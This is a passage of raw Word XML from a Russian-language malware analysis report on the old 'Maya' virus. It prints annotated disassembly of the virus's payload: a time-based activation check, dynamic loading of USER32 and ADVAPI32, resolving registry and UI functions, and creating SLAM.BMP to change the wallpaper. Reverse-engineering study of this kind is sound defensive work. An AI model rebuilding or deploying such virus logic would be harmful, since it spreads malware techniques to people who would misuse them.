        <w:t>удаления файлов или очистки реестра после выполнения payload. Анализ кода функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Payload показывает, что вирус создает файл SLAM.BMP и изменяет настройки в</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>реестре, но не удаляет эти артефакты после выполнения. Это означает, что вирус</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">оставляет </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>следы своей деятельности, что облегчает обнаружение и анализ, но также</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>демонстрирует, что вирус не преследует цели максимальной скрытности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B74A9B3" w14:textId="2D0E9D20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Отсутствие техник удаления следов является характерной особенностью вирусов того</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>периода, когда создатели вирусов часто не задумывались о необходимости скрывать</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>свою деятельность или когда техники удаления следов еще не были широко</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>распространены.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59799EA8" w14:textId="0F3A5B06" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc215414038"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Полезная нагрузка вируса</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="58347CFC" w14:textId="4E45BAB8" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc215414039"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Изменение обоев и отображение сообщения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="2FD30A7A" w14:textId="5E07F97C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Payload вируса Maya является относительно простым, но демонстрирует хорошее понимание</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>работы с системными API Windows. Вирус выполняет визуальное воздействие на систему,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>изменяя обои рабочего стола и отображая сообщение, что является характерным для</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>вирусов конца 1990-х годов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C82C238" w14:textId="6B0CAB5A" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc215414040"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Условия активации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="28CD679D" w14:textId="34FB305A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Адрес: 0x00401760 (начало функции Payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBAD14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CODE:00401760 Payload         proc near</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFAD4C7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CODE:00401760                 call    GetSystemTime_0        ; Получить текущее системное время</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC19D3F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Функция заполняет структуру SYSTEMTIME по адресу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA7A9E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byte_401A35[ebp] с текущей датой и временем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FEB546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Структура SYSTEMTIME содержит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D08E9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wYear, wMonth, wDay, wDayOfWeek</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB9B40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- wHour, wMinute, wSecond, wMilliseconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220FC077" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5157636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CODE:00401765                 cmp     ss:word_401A3B[ebp], 1  ; Сравнить значение переменной с 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208C6B6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Эта переменная, вероятно, была установлена в результате</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46008510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проверки времени (например, проверка дня месяца)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD975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word_401A3B = 1 означает, что условие активации выполнено</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A2FCD4" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CA3B4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CODE:0040176D                 jnz     locret_40192C           ; Если условие НЕ выполнено (word_401A3B != 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335068E9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перейти к выходу из функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED577E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Это означает, что payload активируется только при</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E64C648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выполнении определенного условия, связанного со временем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B17A64E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Например, вирус может активироваться только 15-го числа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2553B24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каждого месяца или только по пятницам</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EA8976" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B22736" w14:textId="3EA83488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CODE:00401773                 ; Если условие выполнено, продолжить выполнение payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA166D3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t>АНАЛИЗ: Данная проверка позволяет вирусу контролировать момент активации payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF2AD9A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t>Это может использоваться для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FADE04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lastRenderedPageBreak/>
        <w:t>1. Избежания немедленного обнаружения при тестировании</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6023F6AC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t>2. Создания эффекта "бомбы замедленного действия"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9D748" w14:textId="69B37FCB" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>3. Активации в определенные дни (например, в день создания вируса или в праздники)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D79C8D" w14:textId="681F5873" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc215414041"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Динамическая загрузка библиотек</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1BFA3065" w14:textId="3A850418" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Для выполнения payload вирусу необходимы функции из библиотек USER32.dll и ADVAPI32.dll,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>которые не были загружены на этапе восстановления IAT. Вирус динамически загружает эти</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>библиотеки и получает адреса необходимых функций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA0B4A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CODE:00401773                 mov     eax, offset aUser32Dll ; Загрузить смещение строки "USER32.dll"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B800DD7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CODE:00401778                 add     eax, ebp                ; Вычислить реальный адрес строки с учетом delta offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9FE9E4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CODE:0040177A                 call    GetModuleHandleA_0_0    ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Вызвать</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetModuleHandleA("USER32.dll")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DCA22C" w14:textId="77777777" w:rsidR="00457074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 xml:space="preserve">                                                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; Функция проверяет, загружена ли библиотека USER32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524663BA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Если загружена, возвращает ее базовый адрес</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716CA611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Если не загружена, возвращает NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702BCFA9" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCA7F67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CODE:0040177F                 cmp     eax, 0                  ; Проверить, была ли библиотека найдена</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028679C0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CODE:00401782                 jz      locret_40192C           ; Если нет (eax == 0), выйти из функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF95A5E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Это может произойти в необычных условиях (например,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280CBB05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поврежденная система или специальная среда)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6F6465" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6B254C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CODE:00401788                 mov     ss:USER32_ImageBase[ebp], eax ; Сохранить базовый адрес USER32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6882ADB2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Этот адрес будет использоваться для получения адресов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DBBBC" w14:textId="784E84BD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; функций MessageBoxA и SystemParametersInfoA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B63FD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t>АНАЛИЗ: USER32.dll содержит функции пользовательского интерфейса Windows, необходимые для:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A079369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t>- MessageBoxA - отображения диалогового окна</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E11AE7" w14:textId="6FAF0D51" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- SystemParametersInfoA - изменения системных параметров (обои, курсор и т.д.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F550F43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CODE:0040178E                 mov     eax, offset aAdvapi32Dll ; Загрузить смещение строки "ADVAPI32.dll"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D37760C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CODE:00401793                 add     eax, ebp                 ; Вычислить реальный адрес строки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B89C2D" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CODE:00401795                 call    GetModuleHandleA_0_0     ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Вызвать</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetModuleHandleA("ADVAPI32.dll")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4C40E3" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>; ADVAPI32.dll содержит функции для работы с реестром</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44623CCD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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                              ; и безопасности Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C35387" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B68075B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CODE:0040179A                 cmp     eax, 0                   ; Проверить результат</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF196F" w14:textId="77777777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CODE:0040179D                 jz      locret_40192C            ; Если библиотека не найдена, выйти</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07442ED7" w14:textId="3FAF760A" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CODE:004017A3                 mov     ss:ADVAPI32_ImageBase[ebp], eax ; Сохранить базовый адрес</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A171AA2" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>АНАЛИЗ</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: ADVAPI32.dll (Advanced Windows 32 Base API) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>содержит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457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33657F49" w14:textId="77777777" w:rsidR="00457074" w:rsidRPr="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Работы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с</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>реестром</w:t>
      </w:r>
      <w:r w:rsidRPr="00457074">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows (RegOpenKeyExA, RegSetValueExA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D0E378" w14:textId="77777777" w:rsidR="00457074" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- Управления службами и безопасностью</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756104A" w14:textId="69300875" w:rsidR="002A5B0E" w:rsidRDefault="00457074" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- Работы с токенами доступа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E7624" w14:textId="1773E47A" w:rsidR="00457074" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc215414042"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Получение адресов функций</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="4BD72359" w14:textId="4EEF6A80" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="00457074">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>После загрузки библиотек вирус получает адреса необходимых функций через GetProcAddress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA694F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CODE:004017A9                 mov     edx, offset aRegopenkeyexa ; Смещение строки "RegOpenKeyExA"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AACABCF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CODE:004017AE                 add     edx, ebp                   ; Реальный адрес строки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47D7E6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CODE:004017B0                 mov     eax, ss:ADVAPI32_ImageBase[ebp] ; Базовый адрес ADVAPI32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78327921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CODE:004017B6                 call    GetProcAddress_0          ; GetProcAddress(hModule, "RegOpenKeyExA")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435DDA74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Функция ищет адрес экспортируемой функции по имени</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02926A89" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRPr="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                               </w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Export Directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>библиотеки</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ADVAPI32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460DCDCE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Возвращает адрес функции или NULL при ошибке</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D2EFC" w14:textId="77777777" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B20272E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CODE:004017BB                 cmp     eax, 0                    ; Проверить результат</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8BDAF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CODE:004017BE                 jz      locret_40192C             ; Если функция не найдена, выйти</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5B111C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CODE:004017C4                 mov     ss:RegOpenKeyExA[ebp], eax ; Сохранить адрес функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6330A7" w14:textId="63AC5CE6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RegOpenKeyExA используется для открытия ключа реестра</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A51198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Аналогичным образом вирус получает адреса:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A09F3A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RegSetValueExA (строки 1106-1112) - для установки значений в реестре</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0957F4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MessageBoxA (строки 1113-1119) - для отображения диалогового окна</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793EB6EC" w14:textId="5D178E50" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>- SystemParametersInfoA (строки 1120-1126) - для изменения системных параметров</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E36C452" w14:textId="78F15751" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc215414043"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Создаение файла обоев</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="71DAFB8D" w14:textId="21C00EFC" w:rsidR="002A5B0E" w:rsidRDefault="002A5B0E" w:rsidP="002A5B0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Вирус создает файл обоев SLAM.BMP с данными, встроенными непосредственно в тело вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29330FC2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lastRenderedPageBreak/>
        <w:t>CODE:0040182D                 push    0                        ; hTemplateFile = NULL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>не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используется</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5B0E">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F05068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CODE:0040182F                 push    80h                      ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4971D5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Атрибут файла: обычный файл без специальных атрибутов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A0E03A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CODE:00401834                 push    2                        ; dwCreationDisposition = CREATE_ALWAYS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC707FC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Всегда создавать файл, перезаписывая существующий</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A0C24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CODE:00401836                 push    0                        ; lpSecurityAttributes = NULL (безопасность по умолчанию)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F008064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CODE:00401838                 push    1                        ; dwShareMode = FILE_SHARE_READ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314A68D3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Другие процессы могут открыть файл только для чтения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA44118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CODE:0040183A                 push    40000000h                ; dwDesiredAccess = GENERIC_WRITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E61F269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Файл открывается только для записи</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9D84EE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CODE:0040183F                 mov     eax, offset aSlamBmp     ; Смещение строки "SLAM.BMP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C016FB0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CODE:00401844                 add     eax, ebp                  ; Реальный адрес строки</w:t>
      </w:r>
    </w:p>
